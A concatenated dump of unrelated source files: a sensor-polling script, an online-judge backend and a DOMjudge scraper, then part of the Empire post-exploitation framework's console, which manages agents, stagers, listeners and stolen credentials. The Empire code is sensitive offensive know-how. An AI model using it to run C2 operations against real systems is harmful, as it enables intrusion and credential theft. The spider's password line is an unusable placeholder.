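# -> scale 2 << 2 = 8, so 1178 * 0.01 * 8 = 94.24 lux.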
log("OPTICAL")
log("\tLIGHT INTENSITY\t: " + str(opti_lux) + "lux")
def turn_sensors_on():
for sensor in active_sensors:
if sensor[1] == move_uuid[1]:
turn_sensor_on(sensor[1], "ffff")
else:
turn_sensor_on(sensor[1], "01")
def turn_sensors_off():
for sensor in active_sensors:
if sensor[1] == move_uuid[1]:
turn_sensor_off(sensor[1], "0000")
else:
turn_sensor_off(sensor[1], "00")
def init_led():
if not stealth_mode:
turn_sensor_on(leds_uuid[1], "01")
def set_led(hnd):
if not stealth_mode:
turn_sensor_on(leds_uuid[0], hnd)
child = pexpect.spawn("gatttool -I")
child.sendline("connect " + sensor_mac)
child.expect(prompt)
child.sendline("characteristics")
child.expect(prompt)
child.before
child.expect(prompt)
characteristics = child.before
handles = characteristics.split("\r\n")
for i in handles:
if len(i) >= 11:
handle = i.replace(":", ",").split(", ")
char_value_handle_value_index = handle.index("char value handle") + 1
uuid_value_index = handle.index("uuid") + 1
if handle[uuid_value_index] not in sensor_uuid_to_cvh:
sensor_uuid_to_cvh[handle[uuid_value_index].upper()] = handle[char_value_handle_value_index].upper()
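# After this loop sensor_uuid_to_cvh maps each full sensor UUID (e.g. 'F000AA01-0451-...') to the
# characteristic value handle reported by gatttool; actual handle values vary by firmware.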
init_led()
while (True):
set_led("03")
turn_sensors_on()
set_led("01")
time.sleep(10)
log("===")
log(str(datetime.now()))
set_led("02")
for sensor in active_sensors:
if sensor[0] == temp_uuid[0]:
print_temp_data(read_sensor_data(sensor[0]))
if sensor[0] == move_uuid[0]:
print_move_data(read_sensor_data(sensor[0]))
if sensor[0] == humd_uuid[0]:
print_humd_data(read_sensor_data(sensor[0]))
if sensor[0] == baro_uuid[0]:
print_baro_data(read_sensor_data(sensor[0]))
if sensor[0] == opti_uuid[0]:
print_opti_data(read_sensor_data(sensor[0]))
set_led("03")
turn_sensors_off()
log("===")
set_led("00")
time.sleep(590)
``` |
{
"source": "Jiubei0408/jiudge-backend",
"score": 2
} |
#### File: api/v1/contest.py
```python
from app.libs.red_print import RedPrint
from app.libs.error_code import *
from flask_login import current_user, login_required
from app.models.contest import Contest
from app.models.relationship.problem_contest import ProblemContestRel
from app.libs.enumerate import ContestState
from app.libs.auth import admin_only
from app.validators.contest import *
from app.validators.problem import *
from app.validators.base import *
from app.services.problem import *
from app.services.contest import *
from app.models.submission import Submission
from app.libs.tools import get_file_response
from app.models.clarification import Clarification
api = RedPrint('contest')
@api.route('/<int:id_>/register', methods=['POST'])
@login_required
def register_contest(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
if contest.is_registered(current_user):
return Forbidden(msg='你已经注册过了')
if contest.state == ContestState.ENDED:
return Forbidden(msg='比赛已结束')
form = ContestRegisterForm().validate_for_api().data_
if contest.password is not None and form['password'] != contest.password:
return Forbidden(msg='密码错误')
from app.models.relationship.user_contest import UserContestRel
UserContestRel.create(username=current_user.username, contest_id=id_)
return Success('注册完成')
@api.route('/<int:id_>', methods=['GET'])
def get_contest_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
contest.registered = contest.is_registered(current_user)
contest.show('registered')
return Success(data=contest)
@api.route('s', methods=['GET'])
def get_contests_api():
form = SearchForm().validate_for_api().data_
data = Contest.search(ready=True, **form)
for contest in data['data']:
contest.registered = contest.is_registered(current_user)
contest.show('registered')
return SearchSuccess(data=data)
@api.route('/<int:id_>/problems', methods=['GET'])
def get_contest_problems(id_):
from app.services.contest import get_problem_list
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
if contest.is_admin(current_user) or contest.state == ContestState.ENDED:
return Success(data=get_problem_list(
contest_id=id_,
username=(current_user.username if not current_user.is_anonymous else None),
show_secret=True
))
if contest.state == ContestState.BEFORE_START:
return AuthFailed(msg='比赛还未开始')
if current_user.is_anonymous:
return AuthFailed(msg='请先登录')
if not contest.is_registered(current_user):
return AuthFailed(msg='你没有注册这场比赛')
return Success(data=get_problem_list(
contest_id=id_,
username=current_user.username,
show_secret=True
))
@api.route('/<int:id_>/scoreboard', methods=['GET'])
def get_scoreboard_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
from app.services.contest import get_scoreboard
return get_scoreboard(contest)
@api.route('/<int:id_>/scoreboard', methods=['DELETE'])
@admin_only
def delete_scoreboard_cache_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
from app.models.scoreboard import Scoreboard
board = Scoreboard.get_by_contest_id(contest.id)
board.modify(scoreboard_json='')
return Success()
@api.route('/create', methods=['POST'])
@admin_only
def create_contest_api():
return NotAchieved()
@api.route('/create_remote_contest', methods=['POST'])
@admin_only
def create_remote_contest_api():
form = CreateRemoteContestForm().validate_for_api().data_
from app.models.oj import OJ
oj = OJ.get_by_id(form['oj_id'])
if oj is None:
return NotFound(msg='没有找到这个oj')
if oj.status != 1:
return Forbidden(msg=f'暂不支持{oj.name}')
password = None if form['password'] == '' else form['password']
create_remote_contest(
contest_name=form['contest_name'],
contest_type=form['contest_type'],
start_time=form['start_time'],
end_time=form['end_time'],
password=password,
oj=oj,
remote_contest_id=form['remote_contest_id']
)
return Success(msg='比赛已创建')
@api.route('/<int:cid>/problem_text_file/<string:pid>', methods=['GET'])
@login_required
def get_problem_text_file_api(cid, pid):
contest = Contest.get_by_id(cid)
if contest is None:
return NotFound(f'Contest {cid} not found')
if not contest.is_admin(current_user) and contest.state == ContestState.BEFORE_START:
return Forbidden('比赛还未开始')
pcrel = ProblemContestRel.get_by_problem_id_in_contest(cid, pid)
if pcrel is None:
return NotFound(f'Contest {cid} has no problem called {pid}')
loc = pcrel.problem.problem_text_file
if loc == '':
return NotFound('没有找到题面文件')
return get_file_response(loc)
@api.route('/<int:cid>/submit/<string:pid>', methods=['POST'])
@login_required
def submit_code_api(cid, pid):
contest = Contest.get_by_id(cid)
if contest is None:
return NotFound(f'Contest {cid} not found')
if not contest.is_admin(current_user) and contest.state != ContestState.RUNNING:
return Forbidden('比赛不在进行中')
pcrel = ProblemContestRel.get_by_problem_id_in_contest(cid, pid)
if pcrel is None:
return NotFound(f'Contest {cid} has no problem called {pid}')
form = SubmitCodeForm().validate_for_api().data_
if contest.is_admin(current_user) or contest.is_registered(current_user):
submit_problem(current_user, pcrel.problem, form['code'], form['lang'], contest)
return Success('提交成功')
else:
return AuthFailed('You should register first')
@api.route('/<int:cid>/status', methods=['GET'])
def get_status_api(cid):
contest = Contest.get_by_id(cid)
if contest is None:
return NotFound(f'Contest {cid} not found')
form = SearchSubmissionForm().validate_for_api().data_
query = {
'contest_id': cid,
**{k: v for k, v in form.items() if v is not None and v != ''}
}
if 'problem_id' in query:
from app.models.relationship.problem_contest import ProblemContestRel
pcrel = ProblemContestRel.get_by_problem_id_in_contest(cid, query['problem_id'])
if pcrel is not None:
query['problem_id'] = pcrel.problem_id
admin = contest.is_admin(current_user)
if not admin and contest.state == ContestState.BEFORE_START:
return AuthFailed(msg='比赛还未开始')
if not admin and contest.state == ContestState.RUNNING:
if current_user.is_anonymous:
return AuthFailed()
if not contest.is_registered(current_user):
return AuthFailed(msg='你没有注册这场比赛')
query['username'] = current_user.username
search_result = Submission.search(**query, order={'id': 'desc'}, enable_fuzzy={'username'})
for submission in search_result['data']:
if admin:
submission.show_secret()
else:
submission.hide_secret()
return Success(data=search_result)
@api.route('/<int:id_>/clarifications')
def get_clarifications_api(id_):
form = SearchForm().validate_for_api().data_
if form['page'] is None:
form['page'] = 1
if form['page_size'] is None:
form['page_size'] = 20
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
return SearchSuccess(data=Clarification.search_by_contest_id(
contest_id=id_,
page=form['page'],
page_size=form['page_size']
))
@api.route('/<int:id_>', methods=['DELETE'])
@admin_only
def delete_contest_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
contest.delete()
return DeleteSuccess(msg='删除成功')
```
#### File: app/libs/auth.py
```python
import functools
from flask_login import current_user
from app.libs.error_code import AuthFailed
from app.libs.enumerate import UserPermission
def admin_only(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if current_user.is_anonymous or current_user.permission != UserPermission.ADMIN:
raise AuthFailed(msg='您不是管理员')
return func(*args, **kwargs)
return wrapper
```
#### File: app/models/scoreboard.py
```python
import datetime
from sqlalchemy import Column, Integer, DateTime, ForeignKey, UnicodeText, Boolean
from app.models.base import Base, db
from app.models.contest import Contest
class Scoreboard(Base):
__tablename__ = 'scoreboard'
fields = ['contest_id', 'scoreboard_json', 'frozen', 'update_time']
contest_id = Column(Integer, ForeignKey(Contest.id), primary_key=True)
scoreboard_json = Column(UnicodeText, default='')
frozen = Column(Boolean, nullable=False, default=False)
update_time = Column(DateTime)
@classmethod
def create(cls, **kwargs):
kwargs.setdefault('update_time', datetime.datetime.now())
return super().create(**kwargs)
@classmethod
def get_by_contest_id(cls, contest_id):
r = cls.search(contest_id=contest_id)['data']
if r:
return r[0]
return None
``` |
{
"source": "Jiubei0408/jiudge-spiderhost",
"score": 3
} |
#### File: app/spiders/domjudge_spider.py
```python
import base64
import json
import re
import time
from bs4 import BeautifulSoup
from app.spiders.base_spider import BaseSpider
class DomjudgeSpider(BaseSpider):
accounts = []
oj_name = 'domjudge'
base_url = ''
def login(self):
url = self.base_url + '/login'
res = self.http.get(url=url, noprint=True)
if len(res.history) > 0:
return
soup = BeautifulSoup(res.text, 'lxml')
csrf_token = soup.find('input', attrs={'name': '_csrf_token'})['value']
data = {
'_csrf_token': csrf_token,
'_username': self.username,
'_password': <PASSWORD>
}
resp = self.http.post(url=url, data=data)
print('login:' + self.username)
return {
'resp_text': resp.text,
'data': data
}
def check_login(self):
cnt = 0
while cnt < 10:
url = self.base_url + '/team'
res = self.http.get(url=url, noprint=True)
if len(res.history) == 0:
return True
login_res = self.login()
cnt += 1
time.sleep(1)
print(self.oj_name + ' login failed: ' + self.username)
raise Exception(json.dumps({
'type': 'login error',
'req_text': res.text,
'login_req_text': login_res
}))
def get_contest_meta(self, contest_id):
self.check_login()
self.switch_contest(contest_id)
url = self.base_url + '/team/problems'
res = self.http.get(url=url)
soup = BeautifulSoup(res.text, 'lxml')
problem_cards = soup.find_all('div', class_='card')
problems = []
main_page = self.http.get(url=self.base_url + '/team')
main_soup = BeautifulSoup(main_page.text, 'lxml')
for card in problem_cards:
if card.text == '':
continue
problem_name = card.find('h4').text.strip()
remote_problem_id = main_soup.find('th', title=f'problem {problem_name}').text.strip()
problem_pdf_url = None
links = card.find_all('a')
for link in links:
href = link['href']
if '/problems/' in href:
p = re.findall('/problems/(.*)/text', href)[0]
problem_pdf_url = self.base_url + f'/team/problems/{p}/text'
problem_pdf = ''
if problem_pdf_url:
problem_pdf = self.http.get(url=problem_pdf_url).content
problem_pdf = base64.b64encode(problem_pdf).decode('utf-8')
limits = card.find('h5').text
limits = limits.replace('\n', '').replace(' ', '')
try:
timelimit = float(re.findall(r'(\d+\.?\d*)second', limits)[0])
except:
timelimit = -1
try:
spacelimit = float(re.findall(r'(\d+\.?\d*)MB', limits)[0]) * 1024
except:
spacelimit = -1
problems.append({
'problem_name': problem_name,
'remote_problem_id': remote_problem_id,
'remote_problem_url': '',
'problem_text': '',
'problem_text_url': '',
'problem_text_file': problem_pdf,
'time_limit': timelimit,
'space_limit': spacelimit,
'allowed_lang': ['c', 'cpp', 'java', 'py3']
})
return problems
def submit_contest_problem(self, contest_id, problem_id, code, lang):
self.check_login()
self.switch_contest(contest_id)
if lang not in ['c', 'cpp', 'java', 'py3']:
raise Exception('language error')
from urllib3 import encode_multipart_formdata
url = self.base_url + '/team/submit'
res = self.http.get(url=url)
res = BeautifulSoup(res.text, 'lxml')
try:
token = res.find('input', attrs={'id': 'submit_problem__token'})['value']
except TypeError:
token = None
problems = res.find('select', attrs={'id': 'submit_problem_problem'}).find_all('option')
for i in problems:
if i.text.startswith(f'{problem_id} -'):
problem_id = i['value']
headers = {'Content-Type': 'multipart/form-data'}
data = {}
ext = ''
if lang == 'c':
ext = 'c'
if lang == 'cpp':
ext = 'cpp'
if lang == 'java':
ext = 'java'
if lang == 'py3':
ext = 'py'
data['submit_problem[code][]'] = (f'temp.{ext}', code.encode('utf-8'))
data['submit_problem[language]'] = lang
data['submit_problem[problem]'] = problem_id
if token:
data['submit_problem[_token]'] = token
form_data = encode_multipart_formdata(data)
data = form_data[0]
headers['Content-Type'] = form_data[1]
res = self.http.post(url=url, headers=headers, data=data)
if len(res.history) == 0:
raise Exception('submit failed')
while True:
time.sleep(5)
finished, status = self.get_last_problem_status()
if finished:
return status
def switch_contest(self, contest_cid):
self.http.get(url=self.base_url + f'/team/change-contest/{contest_cid}')
def get_last_problem_status(self):
data = {
'compile_info': 'There were no compiler errors or warnings.',
'time_used': -1,
'memory_used': -1
}
url = self.base_url + '/team'
res = self.http.get(url=url)
soup = BeautifulSoup(res.text, 'lxml')
row = soup.find('div', class_='col').find('tbody').find('tr')
result = row.find_all('a')[-1].text.strip()
if result == 'pending':
return False, data
data['result'] = self.change_judge_result(result)
data['remote_result'] = result
if result == 'too-late':
return True, data
href = row.find('a')['href']
sid = re.findall('/submission/(.*)', href)[0]
url = self.base_url + '/team/submission/' + sid
res = self.http.get(url=url)
soup = BeautifulSoup(res.text, 'lxml')
if soup.find('pre'):
data['compile_info'] = soup.find('pre').text
return True, data
def change_judge_result(self, result: str):
result = result.upper()
dic = {
'CORRECT': 'AC',
'COMPILER-ERROR': 'CE',
'TIMELIMIT': 'TLE',
'RUN-ERROR': 'RE',
'WRONG-ANSWER': 'WA'
}
if result in dic:
return dic[result]
return 'UNKNOWN'
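# Example (illustrative): change_judge_result('wrong-answer') -> 'WA'; any verdict not in the
# mapping above (including 'too-late') is reported as 'UNKNOWN'.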
``` |
{
"source": "JiucyLucy/Empire",
"score": 2
} |
#### File: lib/common/empire.py
```python
from __future__ import absolute_import
from __future__ import print_function
# make version for Empire
from builtins import input
from builtins import range
from builtins import str
from typing import Optional
from datetime import datetime, timezone
from flask_socketio import SocketIO
VERSION = "3.7.2 BC Security Fork"
from pydispatch import dispatcher
import sys
import cmd
import sqlite3
import os
import hashlib
import time
import shlex
import pkgutil
import base64
import threading
import json
import random
import string
import time
# Empire imports
from . import helpers
from . import messages
from . import agents
from . import listeners
from . import modules
from . import stagers
from . import credentials
from . import users
from . import plugins
from .events import log_event
from zlib_wrapper import compress
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.completion import Completer
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.patch_stdout import patch_stdout
from lib.database.base import Session
from lib.database import models
from sqlalchemy import or_, func, and_
def xstr(s):
"""Safely cast to a string with a handler for None"""
if s is None:
return ''
return str(s)
# custom exceptions used for nested menu navigation
class NavMain(Exception):
"""
Custom exception class used to navigate to the 'main' menu.
"""
pass
class NavAgents(Exception):
"""
Custom exception class used to navigate to the 'agents' menu.
"""
pass
class NavListeners(Exception):
"""
Custom exception class used to navigate to the 'listeners' menu.
"""
pass
class MainMenu(cmd.Cmd):
"""
The main class used by Empire to drive the 'main' menu
displayed when Empire starts.
"""
def __init__(self, args=None):
cmd.Cmd.__init__(self)
# set up the event handling system
dispatcher.connect(self.handle_event, sender=dispatcher.Any)
# globalOptions[optionName] = (value, required, description)
self.globalOptions = {}
# currently active plugins:
# {'pluginName': classObject}
self.loadedPlugins = {}
time.sleep(1)
self.lock = threading.Lock()
# pull out some common configuration information
(self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList, self.obfuscate,
self.obfuscateCommand) = helpers.get_config(
'rootuser, install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command')
# change the default prompt for the user
self.prompt = '(Empire) > '
self.do_help.__func__.__doc__ = '''Displays the help menu.'''
self.doc_header = 'Commands'
# Main, Agents, or
self.menu_state = 'Main'
# parse/handle any passed command line arguments
self.args = args
# instantiate the agents, listeners, and stagers objects
self.agents = agents.Agents(self, args=args)
self.credentials = credentials.Credentials(self, args=args)
self.stagers = stagers.Stagers(self, args=args)
self.modules = modules.Modules(self, args=args)
self.listeners = listeners.Listeners(self, args=args)
self.users = users.Users(self)
self.socketio: Optional[SocketIO] = None
self.resourceQueue = []
# A hashtable of autruns based on agent language
self.autoRuns = {}
self.handle_args()
self.startup_plugins()
message = "[*] Empire starting up..."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
# print the loading menu
messages.loading()
def handle_event(self, signal, sender):
"""
Whenver an event is received from the dispatcher, log it to the DB,
decide whether it should be printed, and if so, print it.
If self.args.debug, also log all events to a file.
"""
# load up the signal so we can inspect it
try:
signal_data = json.loads(signal)
except ValueError:
print(helpers.color("[!] Error: bad signal received {} from sender {}".format(signal, sender)))
return
# if this is related to a task, set task_id; this is its own column in
# the DB (else the column will be set to None/null)
task_id = None
if 'task_id' in signal_data:
task_id = signal_data['task_id']
if 'event_type' in signal_data:
event_type = signal_data['event_type']
else:
event_type = 'dispatched_event'
# print any signal that indicates we should
if ('print' in signal_data and signal_data['print']):
print(helpers.color(signal_data['message']))
# get a db cursor, log this event to the DB, then close the cursor
# TODO instead of "dispatched_event" put something useful in the "event_type" column
log_event(sender, event_type, json.dumps(signal_data), helpers.getutcnow(), task_id=task_id)
# if --debug X is passed, log out all dispatcher signals
if self.args.debug:
with open('empire.debug', 'a') as debug_file:
debug_file.write("%s %s : %s\n" % (helpers.get_datetime(), sender, signal))
if self.args.debug == '2':
# if --debug 2, also print the output to the screen
print(" %s : %s" % (sender, signal))
def startup_plugins(self):
"""
Load plugins at the start of Empire
"""
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
plugin_names = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
for plugin_name in plugin_names:
if plugin_name.lower() != 'example':
print(helpers.color("[*] Plugin {} found.".format(plugin_name)))
message = "[*] Loading plugin {}".format(plugin_name)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="empire")
plugins.load_plugin(self, plugin_name)
def check_root(self):
"""
Check if Empire has been run as root, and alert user.
"""
try:
if os.geteuid() != 0:
if self.isroot:
messages.title(VERSION)
print(
"[!] Warning: Running Empire as non-root, after running as root will likely fail to access prior agents!")
while True:
a = input(helpers.color("[>] Are you sure you want to continue (y) or (n): "))
if a.startswith("y"):
return
if a.startswith("n"):
self.shutdown()
sys.exit()
else:
pass
if os.geteuid() == 0:
if self.isroot:
pass
if not self.isroot:
                    config = Session().query(models.Config).first()
                    config.rootuser = True
                    Session().commit()
except Exception as e:
print(e)
def handle_args(self):
"""
Handle any passed arguments.
"""
if self.args.resource:
resourceFile = self.args.resource[0]
self.do_resource(resourceFile)
if self.args.listener or self.args.stager:
# if we're displaying listeners/stagers or generating a stager
if self.args.listener:
if self.args.listener == 'list':
messages.display_listeners(self.listeners.activeListeners)
messages.display_listeners(self.listeners.get_inactive_listeners(), "Inactive")
else:
activeListeners = self.listeners.activeListeners
targetListener = [l for l in activeListeners if self.args.listener in l[1]]
if targetListener:
targetListener = targetListener[0]
# messages.display_listener_database(targetListener)
# TODO: reimplement this logic
else:
print(helpers.color("\n[!] No active listeners with name '%s'\n" % (self.args.listener)))
else:
if self.args.stager == 'list':
print("\nStagers:\n")
print(" Name Description")
print(" ---- -----------")
for stagerName, stager in self.stagers.stagers.items():
print(" %s%s" % ('{0: <17}'.format(stagerName), stager.info['Description']))
print("\n")
else:
stagerName = self.args.stager
try:
targetStager = self.stagers.stagers[stagerName]
menu = StagerMenu(self, stagerName)
if self.args.stager_options:
for option in self.args.stager_options:
if '=' not in option:
print(helpers.color("\n[!] Invalid option: '%s'" % (option)))
print(helpers.color("[!] Please use Option=Value format\n"))
sys.exit()
# split the passed stager options by = and set the appropriate option
optionName, optionValue = option.split('=')
menu.do_set("%s %s" % (optionName, optionValue))
# generate the stager
menu.do_generate('')
else:
messages.display_stager(targetStager)
except Exception as e:
print(e)
print(helpers.color("\n[!] No current stager with name '%s'\n" % (stagerName)))
# Gracefully shutdown after launcher generation
self.shutdown()
sys.exit()
def shutdown(self):
"""
Perform any shutdown actions.
"""
print("\n" + helpers.color("[!] Shutting down..."))
message = "[*] Empire shutting down..."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
# enumerate all active servers/listeners and shut them down
self.listeners.shutdown_listener('all')
message = "[*] Shutting down plugins..."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
for plugin in self.loadedPlugins:
self.loadedPlugins[plugin].shutdown()
def cmdloop(self):
"""
The main cmdloop logic that handles navigation to other menus.
"""
while True:
try:
if self.menu_state == 'Agents':
self.do_agents('')
elif self.menu_state == 'Listeners':
self.do_listeners('')
else:
# display the main title
messages.title(VERSION)
# get active listeners, agents, and loaded modules
num_agents = self.agents.get_agents_db()
if num_agents:
num_agents = len(num_agents)
else:
num_agents = 0
num_modules = self.modules.modules
if num_modules:
num_modules = len(num_modules)
else:
num_modules = 0
num_listeners = self.listeners.activeListeners
if num_listeners:
num_listeners = len(num_listeners)
else:
num_listeners = 0
print(" " + helpers.color(str(num_modules), "green") + " modules currently loaded\n")
print(" " + helpers.color(str(num_listeners), "green") + " listeners currently active\n")
print(" " + helpers.color(str(num_agents), "green") + " agents currently active\n\n")
if len(self.resourceQueue) > 0:
self.cmdqueue.append(self.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
# handle those pesky ctrl+c's
except KeyboardInterrupt as e:
self.menu_state = "Main"
try:
choice = input(helpers.color("\n[>] Exit? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
self.shutdown()
return True
else:
continue
except KeyboardInterrupt as e:
continue
# exception used to signal jumping to "Main" menu
except NavMain as e:
self.menu_state = "Main"
# exception used to signal jumping to "Agents" menu
except NavAgents as e:
self.menu_state = "Agents"
# exception used to signal jumping to "Listeners" menu
except NavListeners as e:
self.menu_state = "Listeners"
except Exception as e:
print(helpers.color("[!] Exception: %s" % (e)))
time.sleep(5)
def info(self):
"""
        The headless prompt loop: displays module/listener/agent counts and reads commands until the user exits.
"""
session = PromptSession(
complete_in_thread=True,
bottom_toolbar=self.bottom_toolbar,
refresh_interval=5
)
while True:
try:
# get active listeners, agents, and loaded modules
num_agents = len(self.agents.get_agents_db() or [])
num_modules = self.modules.modules
if num_modules:
num_modules = len(num_modules)
else:
num_modules = 0
num_listeners = self.listeners.activeListeners
if num_listeners:
num_listeners = len(num_listeners)
else:
num_listeners = 0
messages.headless_title(VERSION, num_modules, num_listeners, num_agents)
with patch_stdout():
text = session.prompt('Empire > ', refresh_interval=None)
print(helpers.color('[!] Type exit to quit'))
except KeyboardInterrupt:
print(helpers.color("[!] Type exit to quit"))
continue # Control-C pressed. Try again.
except EOFError:
break # Control-D pressed.
if text == 'exit':
choice = input(helpers.color("[>] Exit? [y/N] ", "red"))
if choice.lower() == "y":
self.shutdown()
return True
else:
pass
def bottom_toolbar(self):
        return HTML(f'EMPIRE TEAM SERVER | {len(self.agents.agents)} Agents | '
                    f'{len(self.listeners.activeListeners)} Listeners | '
                    f'{len(self.loadedPlugins)} Plugins')
def print_topics(self, header, commands, cmdlen, maxcol):
"""
Print a nicely formatted help menu.
Adapted from recon-ng
"""
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def emptyline(self):
"""
If any empty line is entered, do nothing.
"""
pass
###################################################
# CMD methods
###################################################
def do_plugins(self, args):
"List all available and active plugins."
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
pluginNames = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
numFound = len(pluginNames)
# say how many we found, handling the 1 case
if numFound == 1:
print(helpers.color("[*] {} plugin found".format(numFound)))
else:
print(helpers.color("[*] {} plugins found".format(numFound)))
# if we found any, list them
if numFound > 0:
print("\tName\tActive")
print("\t----\t------")
activePlugins = list(self.loadedPlugins.keys())
for name in pluginNames:
active = ""
if name in activePlugins:
active = "******"
print("\t" + name + "\t" + active)
print("")
print(helpers.color("[*] Use \"plugin <plugin name>\" to load a plugin."))
def do_plugin(self, pluginName):
"Load a plugin file to extend Empire."
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
pluginNames = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
if pluginName in pluginNames:
print(helpers.color("[*] Plugin {} found.".format(pluginName)))
message = "[*] Loading plugin {}".format(pluginName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
# 'self' is the mainMenu object
plugins.load_plugin(self, pluginName)
else:
raise Exception("[!] Error: the plugin specified does not exist in {}.".format(pluginPath))
def postcmd(self, stop, line):
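        # after each command, feed the next queued resource-file command into cmd's
        # built-in cmdqueue so resource scripts execute one line per prompt cycle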
if len(self.resourceQueue) > 0:
nextcmd = self.resourceQueue.pop(0)
self.cmdqueue.append(nextcmd)
def default(self, line):
"Default handler."
pass
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.resourceQueue.extend(self.buildQueue(arg))
def buildQueue(self, resourceFile, autoRun=False):
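        # Parse a resource file into a flat list of Empire commands. Example file
        # contents (commands are illustrative):
        #   # lines starting with '#' are ignored
        #   uselistener http
        #   execute
        #   resource /root/extra.rc
        # 'resource <file>' lines are expanded recursively; in autorun mode a bare
        # 'execute' gets ' noprompt' appended so it runs without confirmation.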
cmds = []
if os.path.isfile(resourceFile):
with open(resourceFile, 'r') as f:
lines = []
lines.extend(f.read().splitlines())
else:
raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile)
for lineFull in lines:
line = lineFull.strip()
# ignore lines that start with the comment symbol (#)
if line.startswith("#"):
continue
# read in another resource file
elif line.startswith("resource "):
rf = line.split(' ')[1]
cmds.extend(self.buildQueue(rf, autoRun))
# add noprompt option to execute without user confirmation
elif autoRun and line == "execute":
cmds.append(line + " noprompt")
else:
cmds.append(line)
return cmds
def do_exit(self, line):
"Exit Empire"
raise KeyboardInterrupt
def do_agents(self, line):
"Jump to the Agents menu."
try:
agents_menu = AgentsMenu(self)
agents_menu.cmdloop()
except Exception as e:
raise e
def do_listeners(self, line):
"Interact with active listeners."
try:
listener_menu = ListenersMenu(self)
listener_menu.cmdloop()
except Exception as e:
raise e
def do_uselistener(self, line):
"Use an Empire listener module."
parts = line.split(' ')
if parts[0] not in self.listeners.loadedListeners:
print(helpers.color("[!] Error: invalid listener module"))
else:
listenerMenu = ListenerMenu(self, parts[0])
listenerMenu.cmdloop()
def do_usestager(self, line):
"Use an Empire stager."
try:
parts = line.split(' ')
if parts[0] not in self.stagers.stagers:
print(helpers.color("[!] Error: invalid stager module"))
elif len(parts) == 1:
stager_menu = StagerMenu(self, parts[0])
stager_menu.cmdloop()
elif len(parts) == 2:
listener = parts[1]
if not self.listeners.is_listener_valid(listener):
print(helpers.color("[!] Please enter a valid listener name or ID"))
else:
self.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self, parts[0])
stager_menu.cmdloop()
else:
print(helpers.color("[!] Error in MainMenu's do_userstager()"))
except Exception as e:
raise e
def do_usemodule(self, line):
"Use an Empire module."
# Strip asterisks added by MainMenu.complete_usemodule()
line = line.rstrip("*")
if line not in self.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
try:
module_menu = ModuleMenu(self, line)
module_menu.cmdloop()
except Exception as e:
raise e
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
self.modules.search_modules(line.strip())
def do_creds(self, line):
"Add/display credentials to/from the database."
filterTerm = line.strip()
if filterTerm == "":
creds = self.credentials.get_credentials()
elif shlex.split(filterTerm)[0].lower() == "add":
            # add format: "domain username password <notes> <credType> <sid>"
args = shlex.split(filterTerm)[1:]
if len(args) == 3:
domain, username, password = args
if helpers.validate_ntlm(password):
# credtype, domain, username, password, host, sid="", notes=""):
self.credentials.add_credential("hash", domain, username, password, "")
else:
self.credentials.add_credential("plaintext", domain, username, password, "")
elif len(args) == 4:
domain, username, password, notes = args
if helpers.validate_ntlm(password):
self.credentials.add_credential("hash", domain, username, password, "", notes=notes)
else:
self.credentials.add_credential("plaintext", domain, username, password, "", notes=notes)
elif len(args) == 5:
domain, username, password, notes, credType = args
self.credentials.add_credential(credType, domain, username, password, "", notes=notes)
elif len(args) == 6:
domain, username, password, notes, credType, sid = args
self.credentials.add_credential(credType, domain, username, password, "", sid=sid, notes=notes)
else:
print(helpers.color("[!] Format is 'add domain username password <notes> <credType> <sid>"))
return
creds = self.credentials.get_credentials()
elif shlex.split(filterTerm)[0].lower() == "remove":
try:
args = shlex.split(filterTerm)[1:]
if len(args) != 1:
print(helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'"))
else:
if args[0].lower() == "all":
choice = input(helpers.color("[>] Remove all credentials from the database? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
self.credentials.remove_all_credentials()
else:
if "," in args[0]:
credIDs = args[0].split(",")
self.credentials.remove_credentials(credIDs)
elif "-" in args[0]:
parts = args[0].split("-")
